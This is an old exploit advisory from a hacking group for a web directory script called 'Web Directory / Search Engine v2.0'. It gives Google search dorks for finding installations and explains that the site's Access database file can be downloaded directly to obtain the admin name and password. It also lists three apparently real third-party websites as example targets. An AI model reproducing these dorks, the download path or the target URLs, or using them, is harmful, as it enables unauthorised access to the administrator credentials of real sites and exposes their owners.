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Web Directory / Search Engine v2.0 Authentication Bypass/Database Download Vulne


* Advisory : Web Directory / Search Engine v2.0 Authentication Bypass/Database Download Vulnerability
* Release Date       : 25 / 05 / 2007
* Application        : Web Directory / Search Engine v2.0
* Impact             : Remote
* Googledork         : "Web Directory / Search Engine v2.0" ,
*                      or"allinurl:TD_SourcesTblsrch.asp"
* Author             : Titanichacker(egy-virus)
* Contact                         : the-modest-pirate@xxxxxxxxxxx
* Home page               : http://Hack-Teach.org

--/   REPRODUCE   --

# Attackers Can Authentication Bypass In This Product By Add The Following Files: ('/Database.mdb') And Download The Database Which Contains Table Named [admin]
 The admin Name And Password Inside

Examples :
# http://www.salesfly.com/member2/webdirectory/Database.mdb
# http://www.shubhshagun.com/directory/Database.mdb
# http://www.celtichosting.com/webdirectory/Database.mdb


       cold-zero & mohandko & tryag team & hack-teach

# www.Hack-Teach.com  & mohandko.com & tryag.com

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